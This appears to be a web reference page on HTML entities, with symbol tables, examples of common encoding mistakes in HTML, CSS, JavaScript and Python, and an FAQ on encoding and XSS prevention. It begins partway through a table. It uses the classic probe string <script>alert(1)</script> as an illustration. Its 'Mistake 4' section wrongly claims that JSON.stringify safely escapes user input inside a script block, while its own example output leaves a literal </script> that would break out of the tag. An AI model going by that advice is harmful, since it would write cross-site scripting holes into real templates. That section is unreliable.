…	…	…	Horizontal ellipsis — continued...
–	–	–	En dash — used in ranges (2010–2020)
—	—	—	Em dash — sentence break or parenthetical
«	«	«	«French-style left guillemet»
»	»	»	«French-style right guillemet»
·	·	·	Middle dot · interpunct
•	•	•	Bullet point •
§	§	§	Section sign § (legal documents)
¶	¶	¶	Pilcrow / paragraph sign ¶
†	&dagger;	†	Dagger † (footnote marker)
‡	&Dagger;	‡	Double dagger ‡ (footnote marker)

Mathematical Symbols

Symbol	Named	Numeric	Description
±	±	±	Plus-minus ±
×	×	×	Multiplication ×
÷	÷	÷	Division ÷
≈	≈	≈	Approximately equal ≈
≠	≠	≠	Not equal ≠
≤	≤	≤	Less-than or equal ≤
≥	≥	≥	Greater-than or equal ≥
∞	∞	∞	Infinity ∞
√	√	√	Square root √
∑	∑	∑	Summation ∑
∏	∏	∏	Product ∏
∫	∫	∫	Integral ∫
∅	∅	∅	Empty set ∅
∈	∈	∈	Element of ∈
∉	∉	∉	Not element of ∉
∩	∩	∩	Intersection ∩
∪	∪	∪	Union ∪
⊂	⊂	⊂	Subset of ⊂
⊃	⊃	⊃	Superset of ⊃
²	²	²	Superscript 2 (squared) ²
³	³	³	Superscript 3 (cubed) ³
¼	¼	¼	Vulgar fraction one quarter ¼
½	½	½	Vulgar fraction one half ½
¾	¾	¾	Vulgar fraction three quarters ¾

Arrows

Arrow	Named	Numeric	Description
←	←	←	Leftwards arrow
→	→	→	Rightwards arrow
↑	↑	↑	Upwards arrow
↓	↓	↓	Downwards arrow
↔	↔	↔	Left right arrow
⇐	⇐	⇐	Leftwards double arrow
⇒	⇒	⇒	Rightwards double arrow
⇔	⇔	⇔	Left right double arrow
↵	&crarr;	↵	Downwards arrow with corner leftwards (carriage return)

Common HTML Entity Mistakes and How to Fix Them

Mistake 1: Forgetting to Encode Ampersands in URLs

<!-- WRONG — the & breaks HTML validation and may confuse parsers -->
<a href="https://example.com/api?foo=1&bar=2&baz=3">API Call</a>

<!-- CORRECT — encode & as &amp; in HTML attribute values -->
<a href="https://example.com/api?foo=1&amp;bar=2&amp;baz=3">API Call</a>

<!-- Also wrong in meta refresh -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&b=2">
<!-- CORRECT -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&amp;b=2">

Mistake 2: Double Encoding

<!-- Double encoding happens when already-encoded text is encoded again -->

<!-- Original text: Tom & Jerry -->
<!-- After first encode: Tom &amp; Jerry -->
<!-- After second encode: Tom &amp;amp; Jerry  <-- WRONG, shows literally -->

<!-- This often happens in templating chains where multiple layers encode the same variable -->

<!-- Fix: ensure encoding happens exactly once per output context -->

// JavaScript double encoding prevention
function safeEncode(str) {
  // First decode any existing entities to avoid double encoding
  const decoded = new DOMParser()
    .parseFromString(str, 'text/html')
    .documentElement.textContent;
  // Then encode once
  return encodeHtml(decoded);
}

// Python double encoding prevention
import html
def safe_encode(text):
    # Decode first if the text might already be encoded
    decoded = html.unescape(text)
    # Then encode once
    return html.escape(decoded)

Mistake 3: Using HTML Entities in CSS content Values

/* WRONG — HTML entities in CSS are treated as literal text */
.arrow::before { content: '&rarr;'; }  /* Shows: &rarr; */
.copy::after  { content: '&copy;'; }   /* Shows: &copy; */

/* CORRECT — use CSS Unicode escapes */
.arrow::before { content: '\2192'; }   /* Shows: → */
.copy::after  { content: '\00A9'; }   /* Shows: © */

/* Or embed actual characters directly (UTF-8 CSS file) */
.arrow::before { content: '→'; }
.copy::after  { content: '©'; }

Mistake 4: Not Encoding in JavaScript Contexts

// HTML entities are NOT interpreted inside <script> tags
// WRONG approach — thinking HTML encoding protects JS contexts

// If a server template outputs:
// <script>var name = "&lt;script&gt;alert(1)&lt;/script&gt;";</script>
// The browser parses the JS string as the literal characters &lt;script&gt;...
// which is still a string (not injected), but this approach is fragile.

// The CORRECT approach: JSON-encode for JS contexts
// <script>var name = <%= JSON.stringify(userInput) %>;</script>
// => <script>var name = "<script>alert(1)</script>";</script>
// The JSON-encoded string properly escapes the content for JS

// Node.js example (Express + EJS)
app.get('/profile', (req, res) => {
  res.render('profile', {
    // Pass raw data to template
    userName: req.user.name,
    // In EJS: <%= JSON.stringify(userName) %> for JS contexts
    // In EJS: <%- escapeXml(userName) %> for HTML contexts (auto-escaped with <%=)
  });
});

Mistake 5: Using   for Visual Spacing

<!-- WRONG — using &nbsp; for visual indentation or spacing -->
<p>&nbsp;&nbsp;&nbsp;Indented text</p>
<p>First line<br>&nbsp;&nbsp;Second indented line</p>
<td>&nbsp;&nbsp;&nbsp;Cell content</td>

<!-- This is fragile, semantic nonsense, and accessibility nightmare -->

<!-- CORRECT — use CSS for visual spacing -->
<p style="text-indent: 2em;">Indented text</p>
<p style="padding-left: 2em;">Second indented</p>
<td style="padding-left: 1.5rem;">Cell content</td>

<!-- &nbsp; has legitimate uses: -->
<!-- 1. Prevent line break between related words -->
<span>Dr.&nbsp;Smith</span>      <!-- name won't wrap between title and name -->
<span>100&nbsp;km/h</span>       <!-- unit won't separate from number -->
<td>No&nbsp;data</td>            <!-- prevent "No" and "data" from splitting across lines -->

<!-- 2. Keep an empty table cell from collapsing (legacy HTML) -->
<td>&nbsp;</td>
<!-- Modern alternative: CSS empty-cells or min-height -->

Frequently Asked Questions

What is an HTML entity?

An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;), used to represent characters that have special meaning in HTML or that cannot be typed directly. For example, &amp; renders as & and &lt; renders as <. HTML entities exist in two forms: named entities (like &copy; for the copyright symbol) and numeric entities (decimal like &#169; or hexadecimal like &#xA9;).

Why must I encode & < > " in HTML?

These four characters have special syntactic meaning in HTML. The ampersand (&) starts entity references and attribute values. The less-than sign (<) opens HTML tags. The greater-than sign (>) closes HTML tags. The double quote (") delimits attribute values. If you include these characters literally in HTML content or attributes without encoding them, the browser may misinterpret your HTML structure, causing rendering errors or security vulnerabilities.

What is the difference between named and numeric HTML entities?

Named entities use a mnemonic name (e.g., &copy; for copyright, &nbsp; for non-breaking space). Numeric entities use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;). Named entities are more readable but only exist for a subset of characters. Numeric entities work for any Unicode character. Both forms are equally valid in all modern browsers.

Does ' work in HTML?

' (apostrophe entity) was not part of the original HTML 4 specification but was added in HTML5 and XHTML. It is now universally supported in modern browsers. However, for maximum compatibility with older HTML parsers, many developers use the numeric form ' or simply the literal apostrophe character inside double-quoted attributes. In XHTML documents, ' has always been valid because XHTML is an XML application.

What is   and when should I use it?

  is a non-breaking space character (Unicode U+00A0). Unlike a regular space, it prevents the browser from inserting a line break at that position, and unlike regular spaces, consecutive   characters are rendered (regular spaces collapse to one). Use   sparingly: for units after numbers (e.g., 100 km), to keep names together (e.g., Dr. Smith), or to prevent unwanted wrapping in table cells. Do not use it for layout spacing — use CSS margins and padding instead.

How does HTML entity encoding prevent XSS attacks?

Cross-Site Scripting (XSS) attacks inject malicious HTML or JavaScript into web pages. When user-supplied text is rendered in an HTML context, special characters like < > & " must be encoded as HTML entities before insertion. For example, the script tag <script>alert(1)</script> becomes harmless when the < and > are encoded as &lt; and &gt; — the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections.

What is the difference between HTML entity encoding and URL encoding?

HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded.

Which HTML entities are required vs optional?

Required: & must always be encoded as &amp; in HTML text and attribute values. < must always be encoded as &lt; in HTML text content. In HTML attribute values delimited by double quotes, " must be encoded as &quot;. In HTML attribute values delimited by single quotes, apostrophes must be encoded as &apos; or &#39;. Optional but recommended: > can be used literally in most HTML text contexts but encoding as &gt; avoids edge cases. All other characters are optional — modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset.

Try the HTML Entity Encoder/Decoder

Encode and decode HTML entities instantly. Supports named entities, decimal, and hexadecimal numeric entities.

Open HTML Entity Tool →